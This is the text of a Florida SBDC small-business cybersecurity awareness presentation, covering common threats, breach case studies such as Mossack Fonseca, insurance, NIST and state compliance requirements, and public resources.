Florida SBDC at UCF's Cybersecurity for Small Businesses: … · 2019-06-15 · Helping Businesses...
Transcript of Florida SBDC at UCF's Cybersecurity for Small Businesses: … · 2019-06-15 · Helping Businesses...
Helping Businesses Grow & Succeed
Florida SBDC at UCF's Cybersecurity for Small Businesses: Protecting Your
Digital Assets in 2018BYTE-SIZE: The Small Business Cybersecurity
Program of the FSBDC Network
NOTE: These materials are intended to provide information to assist small businesses consider key
cybersecurity concepts, to share ideas for reducing cyber risk, and to identify helpful resources from
multiple public and private organizations. However, no single technology or program can eliminate all
cyber risk nor can they guarantee protection from constantly evolving digital attacks. It is always best to
consult IT security and legal professionals to understand your responsibilities and to manage the specific
cyber risks associated with your business.
This presentation is a companion to the publication entitled The Florida SBDC
Network Byte-Size Program: Cybersecurity Basics for Small Business.
For more information, visit floridasbdc.org/cybersecurity
Helping Businesses Grow & Succeed
Lee V. Mangold
(CISSP, CEH, GLSC, ITIL...)
Co-Founder & CEOGoldSky Security
Co-Founder & Vice PresidentFlorida Cyber Alliance
PresidentInformation Systems Security Association (CFL Chapter)
Board DirectorSecurity BSides Orlando
Adjunct ProfessorUniversity of Central Florida
CYBERSECURITY BASICSSection 1
Helping Businesses Grow & Succeed
Trends (2009-2016)
Helping Businesses Grow & Succeed
Who are the attackers?
• Organized Crime Organizations– Large syndicates of attackers– Hierarchical organizations; Mafia
• State-Sponsored Attackers– Government organizations– Russia, China, Iran, North Korea, etc...
• Script Kiddies– Use downloaded tools and scripts– Motivated by fame
• Other Professionals– Usually experimenting, learning, or
shaming
• Hacktivists– All-the-above– Motivated by a social cause
Helping Businesses Grow & Succeed
Top Threats & Targets
• Top Threats
• Malware – Specifically Ransomware
• Social Engineering– Phishing emails– Extortion attempts
• 3rd Party Data Theft– Stolen Credentials– 3rd Party breaches
• Top Targets• Medical Industry
– Compromising PHI– Compromising PHI– Potentially more...
• Legal Industry– Compromising PII– Compromising PHI
• Financial & Administrative Services– Compromising PII– Fraud and monetary theft
• Retail– Monetary theft (PCI)
Helping Businesses Grow & Succeed
Helping Businesses Grow & Succeed
Helping Businesses Grow & Succeed
Three Foundational Cybersecurity Principles
Know what your critical data/assets areWhat
Know where your critical data/assets areWhere
Know how they are protectedHow
Helping Businesses Grow & Succeed
CLOUD!!
IaaSPaaSSaaS
Helping Businesses Grow & Succeed
Types of Attacks
Helping Businesses Grow & Succeed
MALWARE
• Malicious software
– Steal credentials or other information
– Steal money
– Ransomware
– Botnets
– Sabotage
– Denial of service
Helping Businesses Grow & Succeed
PHISHING
• Email designed to lure you in to
doing something ill-advised
– Execute an attachment
– Click on a link
– Unwittingly give away sensitive
information
• Some are really good at exploiting
human gullibility
Helping Businesses Grow & Succeed
Helping Businesses Grow & Succeed
INTERNET OF THINGS (IoT)
• Increasingly, tech devices are being
targeted
– Eavesdropping
– Steal data
– Botnet agents
– DDoS attacks
Helping Businesses Grow & Succeed
APPLICATION ATTACKS
• Maliciously manipulate application
software
– Steal data from database server
– Run attack scripts on other users’ PCs
– Steal user credentials
Helping Businesses Grow & Succeed
Remediation Activities
Helping Businesses Grow & Succeed
Employee Education
• Technology is great, but
your most important
assets are your
employees
– First line of defense
– Train them on the tools you
use
– Encourage them to report
strange computer activity
Helping Businesses Grow & Succeed
Passwords & MFA
• Use Strong Passwords or Passphrases
• NEVER share your passwords
• Don’t re-use passwords
• Enable Multi-Factor Authentication where possible!
Helping Businesses Grow & Succeed
PROTECTIONS
• Policies and policy
management
• Software updates
• Configurations
• Security products
• Application software
controls
Helping Businesses Grow & Succeed
DETECTION MEASURES
• Event monitoring
• Intrusion detection and
prevention systems
• Threat monitoring
• User reports
Helping Businesses Grow & Succeed
RESPONSES
• Incident response
– Advocates for the business
– Reduce the losses
– Get back in businesses as
quickly as possible
– Support investigations
– Decision support during
incident
– Crisis communications
Helping Businesses Grow & Succeed
INSURANCE
• Is cybersecurity
insurance right for you?
– It depends
– Policies exist
– Read the fine print and
comply with their
requirements
– Answer their questions
candidly
– Understand what is and is
not covered
Helping Businesses Grow & Succeed
INSURANCE 101Key questions:
• Bundled vs. Stand
alone?
• What are the
policy exclusions?
• How much
coverage should I
purchase?
• Who is the breach
response firm? B
und
led
•Bundled cyber policies often offer limited coverage, not broad protection
•Have gaps
•and more exclusions.
•Usually are an endorse- mentto other liability policies.
•Can result in greater exposure
Ele
ctr
onic
Data
Pro
cessin
g (
ED
P)
•EDP policies are not cyber coverage.
•They usually
•cover:
•Data processing equipment.
•Hardware replacement.
•Property coverage.
Sta
nd
-Alo
ne
• Stand alone cyber policies offer the most protection.
•Normally
•cover:
•Third party liability.
•Breach Response.
•Notification.
• Restoration.
• Business interruption.
• Reputation risk.
Sto
p-L
oss (
DIC
)
• DIC plans are for larger organizations with greater risk profiles.
•They provide:
• Catastrophic backstop
•Covers gaps
•Meant for large Losses when underlying coverage is exhausted.
Danger Zone Safe(r) Zone
CASE STUDIES IN CYBERSECURITYSection 2
Helping Businesses Grow & Succeed
Breach Case Studies
• Insurance Company– COO’s Email Account Credentials Phished– Account Data stolen from Email & Storage– Data exfiltrated to unknown destinations in Russia– Had to notify 3600+ individuals, pay for credit monitoring, etc...
• Healthcare Practice– Hard Drive Stolen during A/C Maintenance– Owners extorted, police involved– Had to notify 37,000+ individuals
• CPA & Patent Firm– User sent a fake Docusign link, logged in, downloaded malware– Forwarded the email to colleagues– Data exfiltrated to unknown destinations in Russia
Helping Businesses Grow & Succeed
Breach Case Studies• TerraCom and YourTel America (2014)
– Failed to protect PII of customers– 300,000 identities at risk– Settled with FCC for $3.5M
• Verizon (2017)– Failed to protect PII of customers– 3rd party IT contractor left data unprotected in AWS
• Undisclosed Carrier– Hackers gained unauthorized access to SIP trunks– Hundreds of thousands in fraudulent charges billed to
customers– Company had no idea how to track or prevent the attacks
Helping Businesses Grow & Succeed
Case Study: Mossack Fonseca
Helping Businesses Grow & Succeed
Case Study: Mossack Fonseca
WordPress Website
Plugin: Revolution Slider
Plugin: WP-SMTP plugin
Plugin: ALO EasyMail
Exploited
Email Passwords
Email Passwords
Email Server
Log In
Get M
ail!
Drupal Web Portal
https://Portal.Mossfon.com
Outdated; Several Critical Vulnerabilities
Exploited
Get Data!
Helping Businesses Grow & Succeed
Misconfiguration
Configuration Management
– Are all your systems provisioned to a baseline standard?
– Are all your systems audited REGULARLY?
– Could you audit your systems if you had to?
– Who has access to what data and how is it protected?
Helping Businesses Grow & Succeed
3rd Party Problems
• How do you know your 3rd parties are secure?
• What data do you share with them? Do you know?
• How often have you (or can you) audit 3rd
parties?
• Have THEY been breached already?
Helping Businesses Grow & Succeed
Mismanagement
• Have you formed a security team or a formal security effort?
• Do you have procedures in place to help prevent breaches?
• What do you do when you HAVE a breach? Would you know?
• Are you practicing risk management in IT and Security?
Helping Businesses Grow & Succeed
Seek out best practices!
Begin practicing security risk management
1
Work across IT (and all domains) to identify the “what, where, how”
2
Establish baseline security standards
3
Have a plan and seek help where you need it!
4
CYBERSECURITY COMPLIANCE(AND RISK MANAGEMENT)
Section 3
Helping Businesses Grow & Succeed
Cybersecurity Management
IS
Risk Management
Helping Businesses Grow & Succeed
NIST Cyber Security FrameworkNOT A STEP-BY-STEP PROCESS
Helping Businesses Grow & Succeed
Cyber Risk Management Objectives
• What are my BIGGEST areas of risk?
• What are my potential mitigation strategies?
• What is the cost-benefit of implementing various mitigation strategies?
• What is the cost of doing nothing?
Helping Businesses Grow & Succeed
NIST 800-30 – Security Risk Assessment
Helping Businesses Grow & Succeed
Security - vs - Compliance
Security
Protecting what’s important
• Confidentiality
• Data Integrity
• Availability
Compliance
Following the rules
• 800-151
• HIPAA
• FIPA and other PII regs
• PCI
• GLBA, etc...
Helping Businesses Grow & Succeed
Three Foundational Cybersecurity Principles
Know what your critical data/assets areWhat
Know where your critical data/assets areWhere
Know how they are protectedHow
Helping Businesses Grow & Succeed
Legal Frameworks (Federal)
• Government Contractors– 800-151 Compliance (and more...)
• Healthcare – Health Insurance Portability and Accountability Act (HIPAA)
• Financial Institutions– Gramm-Leach-Bliley Act (GLBA)
• Credit Unions– Various FFIEC / NCUA Regulations
• Federal Agencies– Homeland Security Act (FISMA)
• Public Companies– Sarbanes-Oxley Act (SOX, Section 302 & 404)
• International– General Data Protection Regulation (GDPR)– EU-PrivacyShield
Helping Businesses Grow & Succeed
Florida Information Protection Act
• Each covered entity shall take reasonable measures to protect and secure data in electronic form containing personal information.
• A covered entity shall provide notice to the department of any breach of security affecting 500 or more individuals in this state
What is PII• First & Last Name and one of:
– SSN– Financial Account Number– Government ID number– Health Information or Insurance ID
• Username or Email Address, including password or security questions– Encrypted passwords are not considered PII!
Helping Businesses Grow & Succeed
Other States
• 48 States with Data Breach and/or Data Privacy Laws
– Excludes Alabama and South Dakota
• District of Columbia
• Puerto Rico
• US Virgin Islands
• Guam
Helping Businesses Grow & Succeed
NIST SP 800-171 Compliance
• Describes information protection requirements for:
– Non-Federal Organizations holding Controlled Unclassified Information (CUI)
– 22 Categories of CUI Data
Helping Businesses Grow & Succeed
What is CUI?22 Categories of Controlled CUI
• Agriculture• Controlled Technical Info• Critical Infrastructure• Emergency Management• Export Control Research• Financial Data• Geodetic Information• Immigration• Information Systems Vulns• Intelligence Data or Records• International Agreements• Compulsory Tax Information
• Law Enforcement Data• Legal Data• Natural and Cultural Resources• NATO-Related Data• Nuclear Data• Patent Information • Privacy Information• Procurement and Acquisition• Proprietary Business Data• SAFETY Act Information• Statistical/Census Data• Some Transportation Data
Helping Businesses Grow & Succeed
Controlled Technical Info
• Research and engineering data• Engineering drawings and associated lists• Specifications, standards, process sheets• Manuals• Technical reports• Technical orders• Data sets• Studies and analyses and related information• Computer software executable code and source code• etc...
Helping Businesses Grow & Succeed
800-151 Requirements
• 14 Families of Controls– Access Control – Media Protection – Awareness and Training – Personnel Security – Audit and Accountability – Physical Protection – Configuration Management – Risk Assessment – Identification and Authentication – Security Assessment – Incident Response – System and Communications Protection – Maintenance – System Information Integrity
Helping Businesses Grow & Succeed
Control Example
From NIST SP 800-53
Helping Businesses Grow & Succeed
Control Example
From NIST SP 800-53
Helping Businesses Grow & Succeed
Next Steps...
• Download & Read NIST SP 800-171
– https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-171.pdF
• Plan for Implementation of Controls
– Assess for applicability and impact
• Implement controls like a project
• Continually assess your security!
CYBERSECURITY RESOURCES
Section 4
Helping Businesses Grow & Succeed
RESOURCES AND PLANNING
Information:
• Florida Small Business Development
Center Network: http://floridasbdc.org/cybersecurity
• US Chamber of Commerce https://www.uschamber.com/cyber
Threat Reporting & Alerts:
• FBI IC3: https://www.ic3.gov
• Secure Florida: http://secureflorida.org
Note: Additional resources may be found in the Florida
SBDC Network’s Byte-Size program publication:
Cybersecurity Basics For Small Business
Planning Materials:• US Small Business Administration (SBA):
https://www.sba.gov/business-
guide/manage/prepareemergencies-disaster-
assistance
• SBA Learning Center
at:https://www.sba.gov/tools/sba-learning-
center/training/cybersecurity-small-businesses
• National Institutes for Standards &
Technology (NIST): http://nvlpubs.nist.gov/nistpubs/ir/2016/NIST.IR.76
21r1.pdf
Helping Businesses Grow & Succeed
RELATED TIPS
• Get to know your law
enforcement
– Who are they, what
resources do they have?
– Meet them in person (prior
to needing to)
– Consider FBI’s Infragard